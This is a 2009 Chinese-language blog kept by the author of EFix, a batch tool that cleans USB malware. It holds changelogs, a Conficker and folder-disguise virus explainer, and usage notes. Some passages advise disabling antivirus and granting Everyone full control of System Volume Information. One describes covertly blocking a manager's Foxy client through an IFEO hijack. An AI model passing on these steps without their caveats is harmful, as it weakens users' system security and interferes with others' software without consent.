修正一些無關緊要的錯誤
增加之前批次大修改忘記加進去的東西.


補充:
這一次有測試Vista HomeBasic可以正常使用
Win2000找不到機器測..不過應該也是ok.

2009年7月3日 星期五

EFix Ver 5.2 20090703.31

版本:5.2 20090703.31

檔案資訊:
File size: 906280 bytes
MD5...: 5268b5b7ad3edd8f0913700d0707ee15
SHA1..: 48bd957bfdd38f930e9e7b53c797c21d5d445237

修改事項:
恩......沒改什麼東西就是Script GUI介面做個修改
還有修改建立系統還原時的vbs設置最大執行時間
超過就關閉了,因為好像有人會執行到那邊就當掉的樣子


補充:
Vista和Windows 2000還是沒機會測試
雖然說應該執行是沒有問題啦...

2009年7月1日 星期三

EFix Ver 5.2 20090701.28

版本:5.2 20090701.28

檔案資訊:
File size: 915762 bytes
MD5...: 6e18e9a0b717c2b9e06e60a506f419ec
SHA1..: 3d97e1e7111f4894acf52600de8738008c32b8e7

修改事項:
修正與舊版程式殘留物衝突造成執行中斷的問題

EFix Ver 5.2 20090701.27

版本:5.2 20090701.27

檔案資訊:
File size: 906091 bytes
MD5...: 7e4e3cf188d34d6b6428ca279de6f2e4
SHA1..: 8847b241f39772a102b8bf86d6c8fa6b31fdbb20


修改事項:
開放關閉自動執行 (Autorun)(註) 選項和還原被病毒隱藏的資料夾選項
修改部份程式碼錯誤的地方
增加一點刪除檔案
其餘忘了0rz 有修改不少東西就是。


註: 關閉Autorun功能網路必須要有連線,選取後會將登錄值
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2
的使用者權限關閉,利用關閉權限達到關閉Autorun的效果.
但沒有連線或下載檔案失敗就不會有任何動作請注意

另外此功能目前只有Windows XP和Windows 2000可使用,vista和win7 rc不支援

最後是關閉自動執行這功能還在測試,有需要的話再使用.

2009年6月24日 星期三

EFix Ver 5.2 20090624.22

版本資訊:5.2 20090624.22

檔案資訊:
File size: 905640 bytes
MD5...: af1be82cf013f8792906ddc5798562ce
SHA1..: 1592905b3684da5844365492398e871b96342745

修改紀錄:
所有批次腳本重新整理過,將一些已經沒再看到過的去除,並加上註解.
Script GUI介面更新至1.2版,多兩個選項但功能尚未開啟,時間不夠.
簡化一些掃描程序,主程式不再顯示刪除哪個登錄值,只顯示刪除驅動服務項目和檔案,但要刪除的檔案會直接在類型X就顯示出來.
系統分析程序scan2.bat去除,這樣可以縮短整個批次腳本的執行時間 (我這邊測試大概是縮短30秒左右.隨電腦掛載的東西多寡時間也會有多縮減一些)

補充:
我目前手頭上實在找不到Win Vista和Win 2000可以測試,雖然說整個腳本重新整理過但動作其實是沒有變,只是沒測試並不敢保證執行會沒問題 (目前只有測試Win7 RC1和Win XP)

所以如果不是真的很需要的話建議Win Vista和Win 2000的使用者先不要跑這一版的程式,等有機會測試過OK在貼上來,當然要執行也是可以....應該是不會有問題啦.資料庫都一樣的.

2009年6月22日 星期一

咦?破百萬囉...

甚麼時候破的都不知道...0rz

雖然說應該早就破了
不過還是留言一下


感謝大家的支持m(_o_)m

2009年6月19日 星期五

EFix Ver 5.2 20090619.16

版本: 5.2 20090619.16

檔案資訊:
File size: 904181 bytes
MD5...: 27724e2bc61bee2cf89457ed2530dae3
SHA1..: 9b1fa892a27e3feef456fb9e73ff4b1da5a26a30

修改事項:
修正部分驅動項目不顯示的Bug
增加一點刪除檔案
移除所有檢測winpcap項目
系統分析掃描順序調整一下讓程式看起來比較不像當掉.

2009年6月16日 星期二

EFix Ver 5.2 20090616.14

版本: 5.2 20090616.14

檔案資訊:
File size: 904089 bytes
MD5...: ff19090f25fefb56bc360fdf69473777
SHA1..: 9d39eb9edc6bcd5891bb2e29f37307af9df2e2e4

修改事項:
補充修復昨天還沒修完的東西
減少部分類型3的檢測,看還會不會有人執行之後就停在那

2009年6月15日 星期一

不穩定和無法掌握

不知道為甚麼....總覺得VBSCRIPT不太穩定,也因為只是初學而已
結果最近這幾次的改版弄得不穩定性還蠻高的...

現在搞不清楚的文件的寫入時間
用scripting.filesystemobject的opentextfile建立檔案後
用write寫入檔案

但似乎碰到較大量的資料的時候會有一個延遲時間寫入資料?
這延遲時間搞得我焦頭爛額0rz
延遲時間又因為每一台系統的速度不定時
變成要特別將程序暫停等他跑完...一般要給5秒才比較保險
但這樣就會增加執行時間...非常麻煩

但這問題我現在還是沒有辦法去理解為何會有這樣的情形出現...
我看有必要再另外研究其他的中階語言了...0rz

EFix Ver 5.2 20090615.10

版本:5.2 20090615.10

檔案資訊:
File size: 903409 bytes
MD5...: 27f063912ab6d2c9e5dc873184b34a14
SHA1..: 683bee8d3b3f9c71e4b9442cf726064368cd3eb1

修改事項:
修正一個中等級的錯誤 (偵測到隨身碟但跳過偵測檔案)
因為上述問題算是中等級錯誤問題所以請務必更新

特別感謝PTT abatw 回報問題.

爆了....

前幾天才說空間似乎開始快爆了

結果這今天就真的不行了....0rz

這邊要不能下載的就.....多嘗試幾次吧.

我這邊試反應速度很慢不過下載還算ok.


目前正在想辦法中.

2009年6月14日 星期日

EFix Ver 5.2 20090614.09

版本: 5.2 20090614.09

檔案資訊:
File size: 901137 bytes
MD5...: 5562049da2d3c8fcd308c859a6553849
SHA1..: 13ae6bbd22016699b9bc9bb2314c0083a914d221


修改事項:
增加刪除檔案 (e8main0.dll - e8main9.dll 843wee0.dll - 843wee9.dll)
修一個小錯誤

2009年6月13日 星期六

人數...

這幾天光專注的修一堆有的沒的東西 (不管是工作還是EFix)
結果沒有注意到這幾天的網頁連線人數

沒想到又比之前增加了不少...

看表吧

Today06/13/091543
Yesterday06/12/094077
2 Days Ago06/11/095524
3 Days Ago06/10/093940
4 Days Ago06/09/093541
5 Days Ago06/08/092961
6 Days Ago06/07/093608
7 Days Ago06/06/093321
8 Days Ago06/05/093210
9 Days Ago06/04/093674
10 Days Ago06/03/093926
11 Days Ago06/02/094188
12 Days Ago06/01/095043
13 Days Ago05/31/094057
14 Days Ago05/30/092263
15 Days Ago05/29/092443
16 Days Ago05/28/092845
17 Days Ago05/27/093763
18 Days Ago05/26/094233
19 Days Ago05/25/094233
20 Days Ago05/24/091537
21 Days Ago05/23/091590
22 Days Ago05/22/092155
23 Days Ago05/21/092474
24 Days Ago05/20/092492
25 Days Ago05/19/092779
26 Days Ago05/18/092630
27 Days Ago05/17/092131
28 Days Ago05/16/091845
29 Days Ago05/15/092618
30 Days Ago05/14/097051

不過今天就很少.....
表示最近這一陣子大家都很急著要用隨身碟XD


不過也因為這樣碰到個問題就是
檔案是放在HINET
只要是有超過3K以上的人數就有可能讓這空間爆掉

這兩天就發生這樣的情形....
我剛剛要上傳檔案開空間慢到我想砍人0rz

可是能夠用的空間也不多
所以變成只能死撐在這裡

這樣其實很麻煩....雖然說目前是還勉強可以用
但我也找了半天還是找不到可以用的空間 (一般免空不行,因為牽扯到程式下載更新的問題)

............再看看吧

EFix Ver 5.2 20090613.07

版本: 5.2 20090613.07

檔案資訊:
File size: 901107 bytes
MD5...: 43620bd98ebd5b4907f686079c3ba50c
SHA1..: e267627d976f0d5cba77aede8bc7652f77cb13f3

修改事項:
因為vbs的寫入會延遲所以將掃服務項目的vbs調到前面一點看還會不會有延遲的情形
抓取系統固定資料夾內的檔案修改成使用vbs抓取看速度會不會比較快.


補充:
好多人直接連等都不等就直接scan按下去了...起碼等一下吧.
差不到那幾秒鐘.0rz

2009年6月11日 星期四

EFix Ver 5.2 20090611.05

版本:5.2 20090611.05

檔案資訊:
File size: 899640 bytes
MD5...: a1254020fa69c80fea8433b1171fce64
SHA1..: f96b29ccdcb9c35d5f0b225ee1bdc82ee8119abf

修改事項:
新增一個簡易的圖形介面給自定義刪除腳本用的
增加自定義刪除腳本功能
修改部分使用vbscript偵測的東西,可能會跑得慢一點但比較穩定,比較而已
增加一點點刪除檔案

補充:
自定義腳本和以前的使用方式不同
不要用以前的腳本格式去跑,會沒效果.
另外就是目前有碰到幾個跑vbs會當的,基本上此題無解
因為我這邊模擬不出來....

圖形介面大致長這樣:

2009年6月6日 星期六

EFix Ver 5.1 20090606.33

版本: 5.1 20090606.33

檔案資訊:
File size: 897795 bytes
MD5...: f82df6b1ae28fc46f44395d186f3d3f4
SHA1..: 67818235591eaa1ffc84c9ac91802547e1ae253e

修改事項:
修一大堆寫了很多行但是沒有作用的地方
其中一個比較重要的是當autorun.inf刪除失敗時會顯示該檔案的內容報告
原本不小心將他刪掉了,現在補回去。
其他因為改很多小地方所以.....不詳述
不過不影響一般刪除檔案的運作,都是修正系統分析報告的地方.

補充:
因為有部分的人有跟我提到在vista底下執行會出現找不到指定的登錄值之後會跳出
但我這邊現在手頭上沒有vista可以測試
如果有碰到這樣的問題的人如果可以的話就麻煩到PTT來跟我回報一下,感謝.

2009年6月2日 星期二

隨身碟另類病毒

以目前幾種常見的隨身碟病毒中
其中有一種症狀如下述:

偽裝成正常資料夾欺騙使用者執行
這個是對岸那邊很流行,已經取代隨身碟病毒成為對岸主要流傳的隨身碟病毒
但這個在台灣這邊也有一些災情傳出.
這個需要大致說明他的感染方式

這東西當隨身碟插入到中毒的系統內之後
他會將你隨身碟內的資料夾加上系統和隱藏屬性
之後病毒將自身複製成該資料夾的名稱並偽裝成和資料夾一樣的圖示
這樣在使用者不知情的情形下點擊之後
病毒會先執行並常駐到系統內,之後在幫你開啟你原本要開啟的資料夾
正常來說是這樣....但碰到一個問題點

這東西在對岸來說也不算是新毒了...所以比較勤一點的防毒都可以偵測到
在偵測到之後一般來說都會將該病毒刪除,但在這之前病毒已經
先將原本的資料夾屬性作了更改,所以一般情形會看不到該資料夾
不知情的使用者就會以為是防毒刪了他的重要資料

所以當碰到防毒將你的隨身碟內的資料夾當作是病毒刪除時,請檢查一下
你原本的檔案是否已經被隱藏起來而不是被刪除.

2009年6月1日 星期一

EFix Ver 5.1 20090601.28

版本: 5.1 20090601.28

檔案資訊:
File size: 897650 bytes
MD5...: e4c0109131c3348645ac6faa2175d861
SHA1..: 0d7d533a348588c9098a7d60d4f89ea4b12eb1b4

修改事項:
增加刪除檔案,這兩天似乎很多所以先加.
修改當使用者名稱有()字符時造成在建立作業檔案時腳本程序自動關閉的情形. (執行還有問題的人麻煩到PTT回報一下)

2009年5月31日 星期日

EFix Ver 5.1 20090531.27

版本:5.1 20090531.27

檔案資訊:
File size: 897755 bytes
MD5...: 89162469628cd85e1a14e14020d82a1a
SHA1..: 3fc239e5dfb2ffad3b69842e26b2e9cf70e0415b

修改事項:
修正誤刪除SmartIT Client的啟動登錄值的問題
修改一點類型3的偵測方式看看部分人還會不會有停在那不動的問題.

2009年5月27日 星期三

EFix Ver 5.1 20090527.26

版本: 5.1 20090527.26
檔案資訊:
File size: 897580 bytes
MD5...: 8ec6ba7b3792592bca0051fd534078af
SHA1..: 6e5e059ef90e20e71d2aae80a6cb836d350baeaf

修改事項:
增加檢查system\runscr.dll這個檔案,沒該檔案會嘗試下載並註冊
修改取得驅動服務項目的bug

2009年5月25日 星期一

EFix Ver 5.1 20090525.25

檔案資訊:
File size: 897409 bytes
MD5...: 8e0ecbae09e5a8fd12220b493e9e625c
SHA1..: 7ad45afac0f854be2e6b507ea414769c5697f7fb

修改事項:
增加刪除檔案 (4tddfwq0.dll 4tddfwq1.dll 這一類的變種隨身碟病毒)
增加系統分析掃描項目 (看你防毒有沒有在跑,目前為測試階段)

2009年5月21日 星期四

Net-Worm.Win32.Kido

這東西又叫做Conficker
幾個月前這東西流行了一陣子
但其實沒甚麼人知道自己有中這東西
還是靠防毒通知才知道的....
然而已經一段時間了確還是有人有中這隻的情形出現
所以這邊打個大略說一下

conficker有出a b c變種
c變種就比較少一些
而且c變種已經在5月幾號忘記了進行自我毀滅的動作
所以c變種基本上可以跳過.

然而a和b由於是利用之前微軟作業系統的高度危險漏洞 MS08-067
擴散率其實就和前幾年的疾風病毒差不多的情形
就是你只要連接上網路,就直接中.
然而雖然說安裝了漏洞修補更新之後就可以避免這樣的情形
不過還是建議裝個防火牆會好一點.並將相關的連接關閉

至於中的話要怎麼處理?
由於他這幾個檔案會自我提權到只有system權限才讀的到 ( 我手邊的樣本 )
在一般情形來說會建議使用單獨清除他的清除工具處理

像是
使用這一類的工具會比較好處理
上面網頁如果沒有辦法連結的話就請到其他台乾淨沒中毒的電腦去下載之後再複製到該台電腦上使用.

因為該毒會阻擋中毒電腦和防護網頁的連結.

除了上面這專門清除的工具以外
另外還要安裝 MS08-067(KB958644)

這東西安裝之後才能避免透過網路中這一隻毒.


其他詳細資訊看底下的網頁
http://www.microsoft.com/taiwan/press/2009/01/0114.mspx

其實這已經是有一段時間的東西了也沒有再繼續變種下去....
結果還是會有這麼多人有中這一隻其實還是很意外.

不管怎麼說安全性更新是一定要做的...

2009年5月15日 星期五

進入系統還原資訊夾的方式

系統還原資料夾一般位置為System Volume Information,會位在各磁碟根目錄下
EX: C:\System Volume Information

應該有不少人有碰到防毒軟體有掃描到系統還原資料夾但防毒沒有辦法清除
或者是想進去自已刪除檔案但沒有辦法刪除

一般來說先使用關閉系統還原重複開啟關閉的方是大多都可以清除
但也有碰到部分例外...但原因我並不清楚

這邊交一個進入的方式,不見得一定能用但可以嘗試.

首先底下的選項先處理,如果您不知道怎麼進這選項的話我不建議您自己處理


這樣才看得到系統還原資料夾
不過此時進入的話應該都會出現這個視窗



如果您確定你是以administrator的身分
您可以照底下的選項去修改讓everyone (所有使用者) 都可以存取這個資料夾
首先照底下的選項處理







此時可以發現此資料夾只有SYSTEM權限可以存取,所以我們必須要新增一個使用者進去

按下上圖的新增之後會出現如下圖視窗



在上面的輸入物件名稱來選取處輸入Everyone,之後按下右邊的檢查名稱
此時Everyone會出現底線,在按下確定之後會出現如下圖


此時在Everyone的權限處將完全控制打勾後按確定或套用
此時您就可以試看看是否能夠進入系統還原資料夾了



記得處理完之後要還原原本的設定.

2009年5月14日 星期四

Foxy 少用,要用也要能駕馭才使用

今天公司網路掛了一天...

原本在查的時候本來是發現IP分享器一直reset
而公司經理以為是IP分享器損壞

後來好不容易終於連上內部設定頁面
一進去查詢連線紀錄之後馬上查到一個IP有對外的大量連線
後來去那台電腦用NETSTAT和工作管理員比對PID之後發現

PID對應的程序叫做Foxy.exe......
而當關閉Foxy之後網路連線馬上回復正常
同時全公司網路也回復正常

但用這傢伙的人是我部門的經理所以沒辦法說些啥東西...
只好使用IFEO將Foxy劫持讓他沒辦法使用

先不論Foxy是否容易造成中毒.
在你不會設定不會限制他連線時 (不管是連線數或者是傳輸量),最後網路並不會是只有你一個人癱瘓而已。

這種沒駕馭好就損人損已的軟體...一般還是建議少用。

EFix Ver 5.1 20090514.21

版本:5.1 20090514.21

File size: 895903 bytes
MD5...: 99a99426e92e53e3e95af323a8ff0a60
SHA1..: 56797403774fe303d428040bff9591742e720e6d


修改事項:
  • 因系統使用者名稱造成的中斷問題做個修改嘗試看看能不能解決.
  • 修改讀取啟動資料夾捷徑的vbs語法 ( 以前用Combofix的現在學了一點改用自己做的,並直接使用vbs讀取啟動資料夾位置,在此特別感謝Combofix作者 )
  • 修改讀取services/drivers值的方式 ( 以前用reg抓登錄值現在改用vbs抓取 )
  • 更換nircmd版本,他目前新版本被誤判機率太高,所以換成ver 2.2版的看能不能降低誤判的機會
  • 其他沒有新增刪除的檔案,純針對一些之前碰到的奇怪問題做個修改而已
  • 另外讓目前的windows 7 RC1執行效率好一點所以增加了一點windows 7的一些資料進去讓他跑比較快...一點啦.

2009年4月29日 星期三

先做這樣

google page要收了沒辦法只好作一些變動0rz

東西先移到這邊看看,這兩天整理了一下感覺是還可以用.
不過細部也有一些東西要作處理...麻煩些就是.

2009年4月28日 星期二

EFix 使用注意事項

EFix使用上注意事項:
  • 請注意EFix 並不保證在任何電腦上能夠正常動作,也不保證執行後系統不會發生異常情形,使用時您必須要自行承擔任何可能會造成的風險。
    如果您擔心使用上會造成您任何損失則請勿下載使用 ( 包含其他非本處連結位置下載 )
  • 雖然EFix有清除部分病毒能力的動作,但他並不是掃毒軟體,使用完之後請在使用防毒軟體作系統掃描。
  • 如果您帳戶權限有受限制時,請先提升該帳戶的使用權限之後在執行,請不要在受限帳戶下直接使用其他身分執行,這樣動作會有問題
  • 此程式會將部分作業中程式關閉並有一定機率會強行要求系統自我重新啟動,請先行將資料備存
  • 建議先將防毒常駐關閉之後在執行避免防毒因自我保護而阻擋EFix執行或造成EFix執行出錯情形發生.
  • 此程式在一些防毒軟體上面可能會被誤判為病毒 (EX: Nirsoftnircmd )
    如果擔心此批次程式有問題則請不要下載使用。
    (只保證從此網頁連結內下載檔案之正常性
    其餘連結是否會被另外打包惡意程式進去則無法保證)
  • 如果一執行跳一下黑色視窗後馬上就消失的話,請檢查檔案大小以及檔案資訊並嘗試重新下載執行。 ( 下載位置請盡量避免使用續傳軟體下載 )
  • 手邊有EFix Ver 3.31版之前的人請勿再繼續使用
    EX: http://www.cses.chc.edu.tw/teach_doc/how_to_clear_kavo/EFix.exe
    這應該是1.x版的
    除了在Win2000上使用可能會造成刪除系統磁碟所有檔案以外
    (4.0版後已修正此問題,如果有全磁碟刪除的情形有可能是病毒造成的 EX:,.exe syssetup.exe)
    資料庫和刪除位置也無法因應現在的病毒,請下載新版使用
  • 目前測試可正常使用的作業系統請看各版本發佈的資訊 ( VISTA方面應該是可以用,不過因為沒有系統可以測所以不敢保證. )
  • 目前64位元作業系統皆不支援,僅支援32位元作業系統


版權聲明:
  • 此檔案是利用批次腳本去自動控制其他命令列軟體達到清除惡意程式的效果,也因此此檔案內的其他所有命令列軟體皆為該軟體作者所有,如要另外使用請和該軟體作者連繫.

隱私權聲明:
  • 此檔案會將部分系統資訊蒐集後產生於桌面上產生的LOG.TXT檔案或系統磁碟內的EF_BACKUP資料夾內的LOG.TXT檔案
    但並不會傳送任何資訊給其他人 ( 包含作者 ) 。
    註:僅限EFix的批次腳本本身如此,打包的第三方工具則無從得知,但目前沒有看到有任何會自動上傳資料的情形發生
    但由於LOG.TXT文字報告有部分個人資訊,也因此請妥善保存;如沒有需要 ( 比如像是提供給分析人員進行進一步處理 ) 則請自行刪除


本檔案為自由軟體可免費使用.但不允許底下情形:
  • 未經作者同意自行修改檔案內容.
  • 未經作者同意包裝至其他軟體內,因為這裡面也有其他人做的軟體,EFix本身只是自動執行這些軟體的工具而已.
  • 利用各種管道販售本軟體.
  • 違反使用者當地法律的情形.

EFix 功能介紹

EFix有下列功能:

  • 修復因病毒造成隱藏檔選項無法開啟和我的電腦磁碟圖示雙擊顯示找不到程式的錯誤
  • 修正工作管理員無法開啟的問題 (因登錄檔關閉造成的話)
  • 我個人常碰到的的病毒檔案刪除
  • 會產生掃描報告提供分析
  • 可使用自訂腳本達到自己定義刪除的病毒資料庫


    雙擊磁碟圖示是像底下這樣: